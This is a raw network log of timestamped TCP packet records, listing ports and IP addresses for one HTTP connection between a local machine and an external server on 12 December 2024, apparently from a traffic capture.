Dec 12, 2024 16:48:44.833836079 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.833848000 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.833900928 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.834815979 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.835654974 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.835676908 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.835911989 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.835923910 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.835964918 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.836884022 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.837080002 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.837125063 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.837886095 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.837898970 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.837946892 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.838893890 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.838970900 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.839020967 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.839912891 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.839984894 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.839993954 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.840898991 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.840941906 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.840970039 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.841979980 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.842031002 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.843022108 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.843034029 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.843044996 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.843086004 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.844005108 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.844063044 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.844309092 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.844979048 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.845052958 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.845077991 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.845969915 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.846998930 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.847003937 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.847014904 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.847131968 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.848289967 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.848344088 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.848449945 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.849041939 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.849085093 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.850064993 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.850076914 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.850089073 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.850126028 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.851032019 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.851083040 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.851130962 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.852041006 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.852421999 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.852472067 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.853092909 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.853104115 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.853142023 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.854120970 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.854185104 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.854710102 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.855123043 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.855138063 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.855240107 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.856127024 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.856142998 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.856236935 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.857290983 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.857379913 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.857484102 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.858185053 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.858285904 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.858385086 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.859155893 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.859209061 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.859910011 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.860234976 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.860245943 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.860320091 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.861265898 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.861350060 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.861572027 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.862288952 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.862648010 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.862695932 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.863284111 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.863296986 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.863348961 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.864320993 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.864444017 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.864546061 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.865233898 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.865410089 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.865513086 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.866245985 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.866444111 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.866543055 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.867300987 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.867434978 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.867542982 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.868318081 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.868520021 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.868629932 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.869313002 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.869365931 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.869451046 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.870301008 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.870392084 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.871335030 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.871417999 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.871429920 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.871519089 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.872349024 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.873061895 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.873177052 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.873337030 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.873384953 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.874423027 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.874435902 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.874449015 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.874525070 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.875384092 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.875463009 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.875492096 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.876456976 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.876548052 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.876617908 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.877490997 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.877648115 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:44.877672911 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:44.931580067 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.017124891 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.017208099 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.017307997 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.017339945 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.017433882 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.017496109 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.018369913 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.018659115 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.019474983 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.019578934 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.020000935 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.020159006 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.020618916 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.020632982 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.020740032 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.021617889 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.022598982 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.022608995 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.022639990 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.022687912 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.022706032 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.023533106 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.023705006 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.023792982 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.024461985 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.024749994 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.024859905 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.025593042 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.025784969 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.025863886 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.026667118 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.026676893 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.026788950 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.027699947 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.027911901 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.028004885 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.028695107 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.028817892 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.028911114 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.029602051 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.030596018 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.030606031 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.030616045 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.030684948 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.030709982 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.031548023 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.031908989 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.031991959 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.032694101 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.032706022 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.032795906 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.033691883 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.034019947 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.034106970 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.034681082 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.034873009 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.035186052 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.035653114 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.035840988 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.035928011 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.036710978 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.036726952 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.036814928 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.037664890 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.038243055 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.038368940 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.038711071 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.039254904 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.039354086 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.039678097 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.039920092 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.040008068 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.040838957 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.040849924 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.040957928 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.041748047 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.041857004 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.041984081 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.042824030 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.043576956 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.043669939 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.043786049 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.043807030 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.043900967 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.044799089 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.045327902 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.045422077 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.045835972 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.046840906 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.046853065 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.046892881 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.046931028 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.046957016 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.047791004 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.047921896 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.048029900 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.048840046 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.049014091 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.049124002 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.049823046 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.050719023 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.050825119 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.050856113 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.050863981 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.050954103 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.051858902 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.052385092 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.052476883 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.053080082 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.053090096 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.053190947 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.053927898 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.054028988 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.054126024 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.054882050 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.054960966 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.055723906 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.055886984 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.056288004 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.056381941 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.057059050 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.057930946 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.057943106 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.058032990 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.058099031 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.058199883 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.058970928 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.059288979 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.059705973 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.060089111 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.060220957 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.061045885 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.061055899 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.061131954 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.062020063 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.062690020 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.062782049 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.063067913 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.063070059 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.063169956 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.064054966 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.064954996 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.065037012 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.065108061 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.065119028 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.065146923 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.066047907 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.066833973 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.066962004 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.067070961 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.067114115 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.067224979 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.068134069 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.068555117 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.068651915 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.069118977 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.070188046 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.070195913 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.070306063 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.209661961 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.209708929 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.209845066 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.209927082 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.210139990 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.210876942 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.210920095 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.211003065 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.211026907 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.211606979 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.211910963 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.212678909 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.212786913 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.213713884 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.213723898 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.213733912 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.213829041 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.213851929 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.214657068 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.215713024 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.215723991 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.215733051 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.215806961 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.215837002 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.216707945 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.216922045 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.217017889 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.217749119 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.217758894 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.217843056 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.218724012 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.218894958 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.219705105 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.219757080 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.219878912 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.220825911 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.220835924 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.220902920 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.220927954 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.221858025 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.222820997 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.222831011 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.222861052 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.222913980 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.222979069 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.223823071 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.224237919 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.224328041 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.224807978 CET	80	49946	185.81.68.147	192.168.2.10
